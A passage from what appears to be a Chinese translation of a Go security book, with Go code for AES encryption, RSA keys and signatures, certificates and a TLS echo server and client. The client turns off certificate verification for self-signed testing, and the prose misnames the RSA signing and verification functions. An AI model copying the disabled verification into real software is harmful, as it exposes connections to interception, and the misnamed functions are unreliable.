   // check that the last one is -d or --decrypt
   if len(os.Args) == 4 {
      if os.Args[3] != "-d" && os.Args[3] != "--decrypt" {
         fmt.Println("Error: Unknown usage.")
         printUsage()
         os.Exit(1) // Exit with error code
      }
      return os.Args[1], os.Args[2], true
   }
    return "", "", false // Default blank return
}

func generateKey() []byte {
   randomBytes := make([]byte, 32) // 32 bytes, 256 bit
   numBytesRead, err := rand.Read(randomBytes)
   if err != nil {
      log.Fatal("Error generating random key.", err)
   }
   if numBytesRead != 32 {
      log.Fatal("Error generating 32 random bytes for key.")
   }
   return randomBytes
}

// AES encryption
func encrypt(key, message []byte) ([]byte, error) {
   // Initialize block cipher
   block, err := aes.NewCipher(key)
   if err != nil {
      return nil, err
   }

   // Create the byte slice that will hold encrypted message
   cipherText := make([]byte, aes.BlockSize+len(message))

   // Generate the Initialization Vector (IV) nonce
   // which is stored at the beginning of the byte slice
   // The IV is the same length as the AES blocksize
   iv := cipherText[:aes.BlockSize]
   _, err = io.ReadFull(rand.Reader, iv)
   if err != nil {
      return nil, err
   }

   // Choose the block cipher mode of operation
   // Using the cipher feedback (CFB) mode here.
   // CBCEncrypter also available.
   cfb := cipher.NewCFBEncrypter(block, iv)
   // Generate the encrypted message and store it
   // in the remaining bytes after the IV nonce
   cfb.XORKeyStream(cipherText[aes.BlockSize:], message)

   return cipherText, nil
}

// AES decryption
func decrypt(key, cipherText []byte) ([]byte, error) {
   // Initialize block cipher
   block, err := aes.NewCipher(key)
   if err != nil {
      return nil, err
   }

   // Separate the IV nonce from the encrypted message bytes
   iv := cipherText[:aes.BlockSize]
   cipherText = cipherText[aes.BlockSize:]

   // Decrypt the message using the CFB block mode
   cfb := cipher.NewCFBDecrypter(block, iv)
   cfb.XORKeyStream(cipherText, cipherText)

   return cipherText, nil
}

func main() {
   // if generate key flag, just output a key to stdout and exit
   keyFile, file, decryptFlag := checkArgs()

   // Load key from file
   keyFileData, err := ioutil.ReadFile(keyFile)
   if err != nil {
      log.Fatal("Unable to read key file contents.", err)
   }

   // Load file to be encrypted or decrypted
   fileData, err := ioutil.ReadFile(file)
   if err != nil {
      log.Fatal("Unable to read key file contents.", err)
   }

   // Perform encryption unless the decryptFlag was provided
   // Outputs to STDOUT. User can redirect output to file.
   if decryptFlag {
      message, err := decrypt(keyFileData, fileData)
      if err != nil {
         log.Fatal("Error decrypting. ", err)
      }
      fmt.Printf("%s", message)
   } else {
      cipherText, err := encrypt(keyFileData, fileData)
      if err != nil {
         log.Fatal("Error encrypting. ", err)
      }
      fmt.Printf("%s", cipherText)
   }
}

非对称加密

当每个方都有两个密钥时,就是非对称的。每一方都需要一个公钥和私钥对。非对称加密算法包括 RSA,DSA 和 ECDSA。Go 标准库中有 RSA,DSA 和 ECDSA 的包。一些使用非对称加密的应用包括安全外壳SSH),安全套接字层SSL)和很好的隐私PGP)。

SSL 是由网景公司最初开发的安全套接字层,版本 2 于 1995 年公开发布。它用于加密服务器和客户端之间的通信,提供机密性,完整性和认证。TLS,或传输层安全,是 SSL 的新版本,1.2 版于 2008 年作为 RFC 5246 定义。Go 的 TLS 包并未完全实现规范,但实现了主要部分。了解有关 Go 的crypto/tls包的更多信息,请访问golang.org/pkg/crypto/tls/

您只能加密小于密钥大小的东西,这通常是 2048 位。由于这种大小限制,非对称 RSA 加密不适用于加密整个文档,这些文档很容易超过 2048 位或 256 字节。另一方面,例如 AES 的对称加密可以加密大型文档,但它需要双方共享的密钥。TLS/SSL 使用非对称和对称加密的组合。初始连接和握手使用每一方的公钥和私钥进行非对称加密。一旦建立连接,将生成并共享一个共享密钥。一旦双方都知道共享密钥,非对称加密将被丢弃,其余的通信将使用对称加密,例如使用共享密钥的 AES。

这里的示例将使用 RSA 密钥。我们将介绍如何生成自己的公钥和私钥,并将它们保存为 PEM 编码的文件,数字签名消息和验证签名。在下一节中,我们将使用这些密钥创建自签名证书并建立安全的 TLS 连接。

生成公钥和私钥对

在使用非对称加密之前,您需要一个公钥和私钥对。私钥必须保密并且不与任何人共享。公钥应与他人共享。

RSARivest-Shamir-Adleman)和ECDSA椭圆曲线数字签名算法)算法在 Go 标准库中可用。ECDSA 被认为更安全,但 RSA 是 SSL 证书中最常用的算法。

您可以选择对私钥进行密码保护。您不需要这样做,但这是额外的安全层。由于私钥非常敏感,建议您使用密码保护。

如果要使用对称加密算法(例如 AES)对私钥文件进行密码保护,可以使用一些标准库函数。您将需要的主要函数是x509.EncryptPEMBlock()x509.DecryptPEMBlock()x509.IsEncryptedPEMBlock()

要执行使用 OpenSSL 生成私钥和公钥文件的等效操作,请使用以下内容:

# Generate the private key  
openssl genrsa -out priv.pem 2048 
# Extract the public key from the private key 
openssl rsa -in priv.pem -pubout -out public.pem 

您可以在golang.org/pkg/encoding/pem/了解有关 Go 的 PEM 编码的更多信息。参考以下代码:

package main

import (
   "crypto/rand"
   "crypto/rsa"
   "crypto/x509"
   "encoding/pem"
   "fmt"
   "log"
   "os"
   "strconv"
)

func printUsage() {
   fmt.Printf(os.Args[0] + `

Generate a private and public RSA keypair and save as PEM files.
If no key size is provided, a default of 2048 is used.

Usage:
  ` + os.Args[0] + ` <private_key_filename> <public_key_filename>       [keysize]

Examples:
  # Store generated private and public key in privkey.pem and   pubkey.pem
  ` + os.Args[0] + ` priv.pem pub.pem
  ` + os.Args[0] + ` priv.pem pub.pem 4096`)
}

func checkArgs() (string, string, int) {
   // Too many or too few arguments
   if len(os.Args) < 3 || len(os.Args) > 4 {
      printUsage()
      os.Exit(1)
   }

   defaultKeySize := 2048

   // If there are 2 args provided, privkey and pubkey filenames
   if len(os.Args) == 3 {
      return os.Args[1], os.Args[2], defaultKeySize
   }

   // If 3 args provided, privkey, pubkey, keysize
   if len(os.Args) == 4 {
      keySize, err := strconv.Atoi(os.Args[3])
      if err != nil {
         printUsage()
         fmt.Println("Invalid keysize. Try 1024 or 2048.")
         os.Exit(1)
      }
      return os.Args[1], os.Args[2], keySize
   }

   return "", "", 0 // Default blank return catch-all
}

// Encode the private key as a PEM file
// PEM is a base-64 encoding of the key
func getPrivatePemFromKey(privateKey *rsa.PrivateKey) *pem.Block {
   encodedPrivateKey := x509.MarshalPKCS1PrivateKey(privateKey)
   var privatePem = &pem.Block {
      Type: "RSA PRIVATE KEY",
      Bytes: encodedPrivateKey,
   }
   return privatePem
}

// Encode the public key as a PEM file
func generatePublicPemFromKey(publicKey rsa.PublicKey) *pem.Block {
   encodedPubKey, err := x509.MarshalPKIXPublicKey(&publicKey)
   if err != nil {
      log.Fatal("Error marshaling PKIX pubkey. ", err)
   }

   // Create a public PEM structure with the data
   var publicPem = &pem.Block{
      Type:  "PUBLIC KEY",
      Bytes: encodedPubKey,
   }
   return publicPem
}

func savePemToFile(pemBlock *pem.Block, filename string) {
   // Save public pem to file
   publicPemOutputFile, err := os.Create(filename)
   if err != nil {
      log.Fatal("Error opening pubkey output file. ", err)
   }
   defer publicPemOutputFile.Close()

   err = pem.Encode(publicPemOutputFile, pemBlock)
   if err != nil {
      log.Fatal("Error encoding public PEM. ", err)
   }
}

// Generate a public and private RSA key in PEM format
func main() {
   privatePemFilename, publicPemFilename, keySize := checkArgs()

   // Generate private key
   privateKey, err := rsa.GenerateKey(rand.Reader, keySize)
   if err != nil {
      log.Fatal("Error generating private key. ", err)
   }

   // Encode keys to PEM format
   privatePem := getPrivatePemFromKey(privateKey)
   publicPem := generatePublicPemFromKey(privateKey.PublicKey)

   // Save the PEM output to files
   savePemToFile(privatePem, privatePemFilename)
   savePemToFile(publicPem, publicPemFilename)

   // Print the public key to STDOUT for convenience
   fmt.Printf("%s", pem.EncodeToMemory(publicPem))
}

数字签名消息

签署消息的目的是让接收者知道消息来自正确的人。要签署消息,首先生成消息的哈希,然后使用您的私钥加密哈希。加密的哈希就是您的签名。

接收者将解密你的签名以获得你提供的原始哈希,然后他们将对消息进行哈希处理,看看他们自己从消息中生成的哈希是否与签名的解密值匹配。如果匹配,接收者就知道签名是有效的,并且来自正确的发送者。

请注意,签署一条消息实际上并不加密消息。如果需要,你仍然需要在发送消息之前对消息进行加密。如果你想公开发布你的消息,你可能不想加密消息本身。其他人仍然可以使用签名来验证发布消息的人。

只有小于 RSA 密钥大小的消息才能被签名。因为 SHA-256 哈希总是具有相同的输出长度,我们可以确保它在可接受的大小限制内。在这个例子中,我们使用了 RSA PKCS#1 v1.5 标准签名和 SHA-256 哈希方法。

Go 编程语言提供了核心包中的函数来处理签名和验证。主要函数是rsa.VerifyPKCS1v5。这个函数负责对消息进行哈希处理,然后用私钥对其进行加密。

以下程序将接收一条消息和一个私钥,并将签名输出到STDOUT

package main

import (
   "crypto"
   "crypto/rand"
   "crypto/rsa"
   "crypto/sha256"
   "crypto/x509"
   "encoding/pem"
   "fmt"
   "io/ioutil"
   "log"
   "os"
)

func printUsage() {
   fmt.Println(os.Args[0] + `

Cryptographically sign a message using a private key.
Private key should be a PEM encoded RSA key.
Signature is generated using SHA256 hash.
Output signature is stored in filename provided.

Usage:
  ` + os.Args[0] + ` <privateKeyFilename> <messageFilename>   <signatureFilename>

Example:
  # Use priv.pem to encrypt msg.txt and output to sig.txt.256
  ` + os.Args[0] + ` priv.pem msg.txt sig.txt.256
`)
}

// Get arguments from command line
func checkArgs() (string, string, string) {
   // Need exactly 3 arguments provided
   if len(os.Args) != 4 {
      printUsage()
      os.Exit(1)
   }

   // Private key file name and message file name
   return os.Args[1], os.Args[2], os.Args[3]
}

// Cryptographically sign a message= creating a digital signature
// of the original message. Uses SHA-256 hashing.
func signMessage(privateKey *rsa.PrivateKey, message []byte) []byte {
   hashed := sha256.Sum256(message)

   signature, err := rsa.SignPKCS1v15(
      rand.Reader,
      privateKey,
      crypto.SHA256,
      hashed[:],
   )
   if err != nil {
      log.Fatal("Error signing message. ", err)
   }

   return signature
}

// Load the message that will be signed from file
func loadMessageFromFile(messageFilename string) []byte {
   fileData, err := ioutil.ReadFile(messageFilename)
   if err != nil {
      log.Fatal(err)
   }
   return fileData
}

// Load the RSA private key from a PEM encoded file
func loadPrivateKeyFromPemFile(privateKeyFilename string) *rsa.PrivateKey {
   // Quick load file to memory
   fileData, err := ioutil.ReadFile(privateKeyFilename)
   if err != nil {
      log.Fatal(err)
   }

   // Get the block data from the PEM encoded file
   block, _ := pem.Decode(fileData)
   if block == nil || block.Type != "RSA PRIVATE KEY" {
      log.Fatal("Unable to load a valid private key.")
   }

   // Parse the bytes and put it in to a proper privateKey struct
   privateKey, err := x509.ParsePKCS1PrivateKey(block.Bytes)
   if err != nil {
      log.Fatal("Error loading private key.", err)
   }

   return privateKey
}

// Save data to file
func writeToFile(filename string, data []byte) error {
   // Open a new file for writing only
   file, err := os.OpenFile(
      filename,
      os.O_WRONLY|os.O_TRUNC|os.O_CREATE,
      0666,
   )
   if err != nil {
      return err
   }
   defer file.Close()

   // Write bytes to file
   _, err = file.Write(data)
   if err != nil {
      return err
   }

   return nil
}

// Sign a message using a private RSA key
func main() {
   // Get arguments from command line
   privateKeyFilename, messageFilename, sigFilename := checkArgs()

   // Load message and private key files from disk
   message := loadMessageFromFile(messageFilename)
   privateKey := loadPrivateKeyFromPemFile(privateKeyFilename)

   // Cryptographically sign the message
   signature := signMessage(privateKey, message)

   // Output to file
   writeToFile(sigFilename, signature)
}

验证签名

在前面的例子中,我们学习了如何为接收者创建一条消息的签名以进行验证。现在让我们来看看验证签名的过程。

如果你收到一条消息和一个签名,你必须首先使用发送者的公钥解密签名。然后对原始消息进行哈希处理,看看你的哈希是否与解密的签名匹配。如果你的哈希与解密的签名匹配,那么你可以确定发送者是拥有与你用来验证的公钥配对的私钥的人。

为了验证签名,我们使用了与创建签名相同的算法(RSA PKCS#1 v1.5 with SHA-256)。

这个例子需要两个命令行参数。第一个参数是创建签名的人的公钥,第二个参数是带有签名的文件。要创建一个签名文件,可以使用前面例子中的签名程序,并将输出重定向到一个文件中。

与前一节类似,Go 语言在标准库中有一个用于验证签名的函数。我们可以使用rsa.VerifyPKCS1v5()来比较消息哈希与签名的解密值,并查看它们是否匹配:

package main

import (
   "crypto"
   "crypto/rsa"
   "crypto/sha256"
   "crypto/x509"
   "encoding/pem"
   "fmt"
   "io/ioutil"
   "log"
   "os"
)

func printUsage() {
    fmt.Println(os.Args[0] + `

Verify an RSA signature of a message using SHA-256 hashing.
Public key is expected to be a PEM file.

Usage:
  ` + os.Args[0] + ` <publicKeyFilename> <signatureFilename> <messageFilename>

Example:
  ` + os.Args[0] + ` pubkey.pem signature.txt message.txt
`)
}

// Get arguments from command line
func checkArgs() (string, string, string) {
   // Expect 3 arguments: pubkey, signature, message file names
   if len(os.Args) != 4 {
      printUsage()
      os.Exit(1)
   }

   return os.Args[1], os.Args[2], os.Args[3]
}

// Returns bool whether signature was verified
func verifySignature(
   signature []byte,
   message []byte,
   publicKey *rsa.PublicKey) bool {

   hashedMessage := sha256.Sum256(message)

   err := rsa.VerifyPKCS1v15(
      publicKey,
      crypto.SHA256,
      hashedMessage[:],
      signature,
   )

   if err != nil {
      log.Println(err)
      return false
   }
   return true // If no error, match.
}

// Load file to memory
func loadFile(filename string) []byte {
   fileData, err := ioutil.ReadFile(filename)
   if err != nil {
      log.Fatal(err)
   }
   return fileData
}

// Load a public RSA key from a PEM encoded file
func loadPublicKeyFromPemFile(publicKeyFilename string) *rsa.PublicKey {
   // Quick load file to memory
   fileData, err := ioutil.ReadFile(publicKeyFilename)
   if err != nil {
      log.Fatal(err)
   }

   // Get the block data from the PEM encoded file
   block, _ := pem.Decode(fileData)
   if block == nil || block.Type != "PUBLIC KEY" {
      log.Fatal("Unable to load valid public key. ")
   }

   // Parse the bytes and store in a public key format
   publicKey, err := x509.ParsePKIXPublicKey(block.Bytes)
   if err != nil {
      log.Fatal("Error loading public key. ", err)
   }

   return publicKey.(*rsa.PublicKey) // Cast interface to PublicKey
}

// Verify a cryptographic signature using RSA PKCS#1 v1.5 with SHA-256
// and a PEM encoded PKIX public key.
func main() {
   // Parse command line arguments
   publicKeyFilename, signatureFilename, messageFilename :=   
      checkArgs()

   // Load all the files from disk
   publicKey := loadPublicKeyFromPemFile(publicKeyFilename)
   signature := loadFile(signatureFilename)
   message := loadFile(messageFilename)

   // Verify signature
   valid := verifySignature(signature, message, publicKey)

   if valid {
      fmt.Println("Signature verified.")
   } else {
      fmt.Println("Signature could not be verified.")
   }
}

TLS

我们通常不会使用 RSA 加密整个消息,因为它只能加密小于密钥大小的消息。解决这个问题的方法通常是从使用 RSA 密钥加密的小消息开始通信。当它们建立了一个安全通道后,它们可以安全地交换一个共享密钥,用于对其余消息进行对称加密,而不受大小限制。这是 SSL 和 TLS 用来建立安全通信的方法。握手过程负责协商在生成和共享对称密钥时将使用哪些加密算法。

生成自签名证书

要使用 Go 创建自签名证书,你需要一个公钥和私钥对。x509 包中有一个用于创建证书的函数。它需要公钥和私钥以及一个包含所有信息的模板证书。由于我们是自签名的,模板证书也将用作执行签名的父证书。

每个应用程序可以以不同的方式处理自签名证书。有些应用程序会在证书是自签名时警告你,有些会拒绝接受它,而其他一些则会在不警告你的情况下使用它。当你编写自己的应用程序时,你将不得不决定是否要验证证书或接受自签名证书。

重要的函数是x509.CreateCertificate(),在golang.org/pkg/crypto/x509/#CreateCertificate中有引用。以下是函数签名:

func CreateCertificate (rand io.Reader, template, parent *Certificate, pub, 
   priv interface{}) (cert []byte, err error)

这个例子将使用私钥生成一个由它签名的证书,并将其保存为 PEM 格式的文件。一旦你创建了一个自签名证书,你就可以将该证书与私钥一起使用,运行安全的 TLS 套接字监听器和 Web 服务器。

为了简洁起见,这个例子将证书所有者信息和主机名 IP 硬编码为 localhost。这对于在本地机器上进行测试已经足够了。

根据需要修改这些内容,自定义值,通过命令行参数输入,或者使用标准输入动态获取用户的值,如下面的代码块所示:

package main

import (
   "crypto/rand"
   "crypto/rsa"
   "crypto/x509/pkix"
   "crypto/x509"
   "encoding/pem"
   "fmt"
   "io/ioutil"
   "log"
   "math/big"
   "net"
   "os"
   "time"
)

func printUsage() {
   fmt.Println(os.Args[0] + ` - Generate a self signed TLS certificate

Usage:
  ` + os.Args[0] + ` <privateKeyFilename> <certOutputFilename> [-ca|--cert-authority]

Example:
  ` + os.Args[0] + ` priv.pem cert.pem
  ` + os.Args[0] + ` priv.pem cacert.pem -ca
`)
}

func checkArgs() (string, string, bool) {
   if len(os.Args) < 3 || len(os.Args) > 4 {
      printUsage()
      os.Exit(1)
   }

   // See if the last cert authority option was passed
   isCA := false // Default
   if len(os.Args) == 4 {
      if os.Args[3] == "-ca" || os.Args[3] == "--cert-authority" {
         isCA = true
      }
   }

   // Private key filename, cert output filename, is cert authority
   return os.Args[1], os.Args[2], isCA
}

func setupCertificateTemplate(isCA bool) x509.Certificate {
   // Set valid time frame to start now and end one year from now
   notBefore := time.Now()
   notAfter := notBefore.Add(time.Hour * 24 * 365) // 1 year/365 days

   // Generate secure random serial number
   serialNumberLimit := new(big.Int).Lsh(big.NewInt(1), 128)
   randomNumber, err := rand.Int(rand.Reader, serialNumberLimit)
   if err != nil {
      log.Fatal("Error generating random serial number. ", err)
   }

   nameInfo := pkix.Name{
      Organization: []string{"My Organization"},
      CommonName: "localhost",
      OrganizationalUnit: []string{"My Business Unit"},
      Country:        []string{"US"}, // 2-character ISO code
      Province:       []string{"Texas"}, // State
      Locality:       []string{"Houston"}, // City
   }

   // Create the certificate template
   certTemplate := x509.Certificate{
      SerialNumber: randomNumber,
      Subject: nameInfo,
      EmailAddresses: []string{"test@localhost"},
      NotBefore: notBefore,
      NotAfter: notAfter,
      KeyUsage: x509.KeyUsageKeyEncipherment |   
         x509.KeyUsageDigitalSignature,
      // For ExtKeyUsage, default to any, but can specify to use
      // only as server or client authentication, code signing, etc
      ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageAny},
      BasicConstraintsValid: true,
      IsCA: false,
   }

   // To create a certificate authority that can sign cert signing   
   // requests, set these
   if isCA {
      certTemplate.IsCA = true
      certTemplate.KeyUsage = certTemplate.KeyUsage |  
         x509.KeyUsageCertSign
   }

   // Add any IP addresses and hostnames covered by this cert
   // This example only covers localhost
   certTemplate.IPAddresses = []net.IP{net.ParseIP("127.0.0.1")}
   certTemplate.DNSNames = []string{"localhost", "localhost.local"}

   return certTemplate
}

// Load the RSA private key from a PEM encoded file
func loadPrivateKeyFromPemFile(privateKeyFilename string) *rsa.PrivateKey {
   // Quick load file to memory
   fileData, err := ioutil.ReadFile(privateKeyFilename)
   if err != nil {
      log.Fatal("Error loading private key file. ", err)
   }

   // Get the block data from the PEM encoded file
   block, _ := pem.Decode(fileData)
   if block == nil || block.Type != "RSA PRIVATE KEY" {
      log.Fatal("Unable to load a valid private key.")
   }

   // Parse the bytes and put it in to a proper privateKey struct
   privateKey, err := x509.ParsePKCS1PrivateKey(block.Bytes)
   if err != nil {
      log.Fatal("Error loading private key. ", err)
   }

   return privateKey
}

// Save the certificate as a PEM encoded file
func writeCertToPemFile(outputFilename string, derBytes []byte ) {
   // Create a PEM from the certificate
   certPem := &pem.Block{Type: "CERTIFICATE", Bytes: derBytes}

   // Open file for writing
   certOutfile, err := os.Create(outputFilename)
   if err != nil {
      log.Fatal("Unable to open certificate output file. ", err)
   }
   pem.Encode(certOutfile, certPem)
   certOutfile.Close()
}

// Create a self-signed TLS/SSL certificate for localhost 
// with an RSA private key
func main() {
   privPemFilename, certOutputFilename, isCA := checkArgs()

   // Private key of signer - self signed means signer==signee
   privKey := loadPrivateKeyFromPemFile(privPemFilename)

   // Public key of signee. Self signing means we are the signer and    
   // the signee so we can just pull our public key from our private key
   pubKey := privKey.PublicKey

   // Set up all the certificate info
   certTemplate := setupCertificateTemplate(isCA)

   // Create (and sign with the priv key) the certificate
   certificate, err := x509.CreateCertificate(
      rand.Reader,
      &certTemplate,
      &certTemplate,
      &pubKey,
      privKey,
   )
   if err != nil {
      log.Fatal("Failed to create certificate. ", err)
   }

   // Format the certificate as a PEM and write to file
   writeCertToPemFile(certOutputFilename, certificate)
}

创建证书签名请求

如果你不想创建自签名证书,你必须创建一个证书签名请求,并让受信任的证书颁发机构对其进行签名。你可以通过调用x509.CreateCertificateRequest()并传递一个带有私钥的x509.CertificateRequest对象来创建一个证书请求。

使用 OpenSSL 进行等效操作如下:

# Create CSR 
openssl req -new -key priv.pem -out csr.pem 
# View details to verify request was created properly 
openssl req -verify -in csr.pem -text -noout 

这个例子演示了如何创建证书签名请求:

package main

import (
   "crypto/rand"
   "crypto/rsa"
   "crypto/x509"
   "crypto/x509/pkix"
   "encoding/pem"
   "fmt"
   "io/ioutil"
   "log"
   "net"
   "os"
)

func printUsage() {
   fmt.Println(os.Args[0] + ` - Create a certificate signing request  
   with a private key.

Private key is expected in PEM format. Certificate valid for localhost only.
Certificate signing request is created using the SHA-256 hash.

Usage:
  ` + os.Args[0] + ` <privateKeyFilename> <csrOutputFilename>

Example:
  ` + os.Args[0] + ` priv.pem csr.pem
`)
}

func checkArgs() (string, string) {
   if len(os.Args) != 3 {
      printUsage()
      os.Exit(1)
   }

   // Private key filename, cert signing request output filename
   return os.Args[1], os.Args[2]
}

// Load the RSA private key from a PEM encoded file
func loadPrivateKeyFromPemFile(privateKeyFilename string) *rsa.PrivateKey {
   // Quick load file to memory
   fileData, err := ioutil.ReadFile(privateKeyFilename)
   if err != nil {
      log.Fatal("Error loading private key file. ", err)
   }

   // Get the block data from the PEM encoded file
   block, _ := pem.Decode(fileData)
   if block == nil || block.Type != "RSA PRIVATE KEY" {
      log.Fatal("Unable to load a valid private key.")
   }

   // Parse the bytes and put it in to a proper privateKey struct
   privateKey, err := x509.ParsePKCS1PrivateKey(block.Bytes)
   if err != nil {
      log.Fatal("Error loading private key.", err)
   }

   return privateKey
}

// Create a CSR PEM and save to file
func saveCSRToPemFile(csr []byte, filename string) {
   csrPem := &pem.Block{
      Type:  "CERTIFICATE REQUEST",
      Bytes: csr,
   }
   csrOutfile, err := os.Create(filename)
   if err != nil {
      log.Fatal("Error opening "+filename+" for saving. ", err)
   }
   pem.Encode(csrOutfile, csrPem)
}

// Create a certificate signing request with a private key 
// valid for localhost
func main() {
   // Load parameters
   privKeyFilename, csrOutFilename := checkArgs()
   privKey := loadPrivateKeyFromPemFile(privKeyFilename)

   // Prepare information about organization the cert will belong to
   nameInfo := pkix.Name{
      Organization:       []string{"My Organization Name"},
      CommonName:         "localhost",
      OrganizationalUnit: []string{"Business Unit Name"},
      Country:            []string{"US"}, // 2-character ISO code
      Province:           []string{"Texas"},
      Locality:           []string{"Houston"}, // City
   }

   // Prepare CSR template
   csrTemplate := x509.CertificateRequest{
      Version:            2, // Version 3, zero-indexed values
      SignatureAlgorithm: x509.SHA256WithRSA,
      PublicKeyAlgorithm: x509.RSA,
      PublicKey:          privKey.PublicKey,
      Subject:            nameInfo,

      // Subject Alternate Name values.
      DNSNames:       []string{"Business Unit Name"},
      EmailAddresses: []string{"test@localhost"},
      IPAddresses:    []net.IP{},
   }

   // Create the CSR based off the template
   csr, err := x509.CreateCertificateRequest(rand.Reader,  
      &csrTemplate, privKey)
   if err != nil {
      log.Fatal("Error creating certificate signing request. ", err)
   }
   saveCSRToPemFile(csr, csrOutFilename)
}

签署证书请求

在前面的例子中,当生成自签名证书时,我们已经演示了创建签名证书的过程。在自签名的例子中,我们只是使用了与签名者相同的证书模板。因此,没有单独的代码示例。唯一的区别是进行签名的父证书或要签名的模板应该被替换为不同的证书。

这是x509.CreateCertificate()的函数定义:

func CreateCertificate(rand io.Reader, template, parent *Certificate, pub, 
   priv interface{}) (cert []byte, err error)

在自签名的例子中,模板和父证书是同一个对象。要签署证书请求,创建一个新的证书对象,并用签名请求中的信息填充字段。将新证书作为模板,使用签名者的证书作为父证书。pub参数是受让人的公钥,priv参数是签名者的私钥。签名者是证书颁发机构,受让人是请求者。你可以在golang.org/pkg/crypto/x509/#CreateCertificate了解更多关于这个函数的信息。

X509.CreateCertificate()的参数如下:

  • rand:这是密码学安全的伪随机数生成器

  • template:这是使用 CSR 中的信息填充的证书模板

  • parent:这是签名者的证书

  • pub:这是受让人的公钥

  • priv:这是签名者的私钥

使用 OpenSSL 进行等效操作如下:

# Create signed certificate using
# the CSR, CA certificate, and private key 
openssl x509 -req -in csr.pem -CA cacert.pem \
-CAkey capriv.pem -CAcreateserial \
-out cert.pem -sha256
# Print info about cert 
openssl x509 -in cert.pem -text -noout  

TLS 服务器

你可以像设置普通套接字连接一样设置监听器,但是加密。只需调用 TLS 的Listen()函数,并提供你的证书和私钥。使用前面示例中生成的证书和密钥将起作用。

以下程序将创建一个 TLS 服务器,并回显接收到的任何数据,然后关闭连接。服务器不需要或验证客户端证书,但是用于进行验证的代码被注释掉,以供参考,以防你想要使用证书对客户端进行身份验证:

package main

import (
   "bufio"
   "crypto/tls"
   "fmt"
   "log"
   "net"
   "os"
)

func printUsage() {
   fmt.Println(os.Args[0] + ` - Start a TLS echo server

Server will echo one message received back to client.
Provide a certificate and private key file in PEM format.
Host string in the format: hostname:port

Usage:
  ` + os.Args[0] + ` <certFilename> <privateKeyFilename> <hostString>

Example:
  ` + os.Args[0] + ` cert.pem priv.pem localhost:9999
`)
}

func checkArgs() (string, string, string) {
  if len(os.Args) != 4 {
     printUsage()
     os.Exit(1)
  }

  return os.Args[1], os.Args[2], os.Args[3]
}

// Create a TLS listener and echo back data received by clients.
func main() {
   certFilename, privKeyFilename, hostString := checkArgs()

   // Load the certificate and private key
   serverCert, err := tls.LoadX509KeyPair(certFilename, privKeyFilename)
   if err != nil {
      log.Fatal("Error loading certificate and private key. ", err)
   }

   // Set up certificates, host/ip, and port
   config := &tls.Config{
      // Specify server certificate
      Certificates: []tls.Certificate{serverCert},

      // By default no client certificate is required.
      // To require and validate client certificates, specify the
      // ClientAuthType to be one of:
      //    NoClientCert, RequestClientCert, RequireAnyClientCert,
      //    VerifyClientCertIfGiven, RequireAndVerifyClientCert)

      // ClientAuth: tls.RequireAndVerifyClientCert

      // Define the list of certificates you will accept as
      // trusted certificate authorities with ClientCAs.

      // ClientCAs: *x509.CertPool
   }

   // Create the TLS socket listener
   listener, err := tls.Listen("tcp", hostString, config)
   if err != nil {
      log.Fatal("Error starting TLS listener. ", err)
   }
   defer listener.Close()

   // Listen forever for connections
   for {
      clientConnection, err := listener.Accept()
      if err != nil {
         log.Println("Error accepting client connection. ", err)
         continue
      }
      // Launch a goroutine(thread)go-1.6 to handle each connection
      go handleConnection(clientConnection)
   }
}

// Function that gets launched in a goroutine to handle client connection
func handleConnection(clientConnection net.Conn) {
   defer clientConnection.Close()
   socketReader := bufio.NewReader(clientConnection)
   for {
      // Read a message from the client
      message, err := socketReader.ReadString('\n')
      if err != nil {
         log.Println("Error reading from client socket. ", err)
         return
      }
      fmt.Println(message)

      // Echo back the data to the client.
      numBytesWritten, err := clientConnection.Write([]byte(message))
      if err != nil {
         log.Println("Error writing data to client socket. ", err)
         return
      }
      fmt.Printf("Wrote %d bytes back to client.\n", numBytesWritten)
   }
}

TLS 客户端

TCP 套接字是在网络上进行通信的一种简单而常见的方式。在标准库中使用 Go 的 TLS 层覆盖标准 TCP 套接字非常简单。

客户端拨号 TLS 服务器就像标准套接字一样。客户端通常不需要任何类型的密钥或证书,但服务器可以实现客户端身份验证,并只允许特定用户连接。

该程序将连接到一个 TLS 服务器,并将 STDIN 的内容发送到远程服务器并读取响应。我们可以使用这个程序来测试在上一节中创建的基本 TLS 回显服务器。

在运行此程序之前,请确保上一节中的 TLS 服务器正在运行,以便您可以连接。

请注意,这是一个原始的套接字级服务器。它不是一个 HTTP 服务器。在第九章 Web 应用中,有一些运行 HTTPS TLS Web 服务器的示例。

默认情况下,客户端会验证服务器的证书是否由受信任的机构签名。我们必须覆盖这个默认设置,并告诉客户端不要验证证书,因为我们自己签名了它。受信任的证书颁发机构列表是从系统中加载的,但可以通过在tls.Config中填充 RootCAs 变量来覆盖。这个例子不会验证服务器证书,但提供了提供一组受信任的 RootCAs 的代码,供参考时注释掉。

您可以通过查看golang.org/src/crypto/x509/中的root_*.go文件来了解 Go 如何为每个系统加载证书池。例如,root_windows.goroot_linux.go加载系统的默认证书。

如果您想连接到服务器并检查或存储其证书,您可以连接,然后检查客户端的net.Conn.ConnectionState().PeerCertificates。它以标准的x509.Certificate结构形式呈现。要这样做,请参考以下代码块:

package main

import (
   "crypto/tls"
   "fmt"
   "log"
   "os"
)

func printUsage() {
   fmt.Println(os.Args[0] + ` - Send and receive a message to a TLS server

Usage:
  ` + os.Args[0] + ` <hostString>

Example:
  ` + os.Args[0] + ` localhost:9999
`)
}

func checkArgs() string {
   if len(os.Args) != 2 {
      printUsage()
      os.Exit(1)
   }

   // Host string e.g. localhost:9999
   return os.Args[1]
}

// Simple TLS client that sends a message and receives a message
func main() {
   hostString := checkArgs()
   messageToSend := "Hello?\n"

   // Configure TLS settings
   tlsConfig := &tls.Config{
      // Required to accept self-signed certs
      InsecureSkipVerify: true, 
      // Provide your client certificate if necessary
      // Certificates: []Certificate

      // ServerName is used to verify the hostname (unless you are     
      // skipping verification)
      // It is also included in the handshake in case the server uses   
      // virtual hosts Can also just be an IP address 
      // instead of a hostname.
      // ServerName: string,

      // RootCAs that you are willing to accept
      // If RootCAs is nil, the host's default root CAs are used
      // RootCAs: *x509.CertPool
   }

   // Set up dialer and call the server
   connection, err := tls.Dial("tcp", hostString, tlsConfig)
   if err != nil {
      log.Fatal("Error dialing server. ", err)
   }
   defer connection.Close()

   // Write data to socket
   numBytesWritten, err := connection.Write([]byte(messageToSend))
   if err != nil {
      log.Println("Error writing to socket. ", err)
      os.Exit(1)
   }
   fmt.Printf("Wrote %d bytes to the socket.\n", numBytesWritten)

   // Read data from socket and print to STDOUT
   buffer := make([]byte, 100)
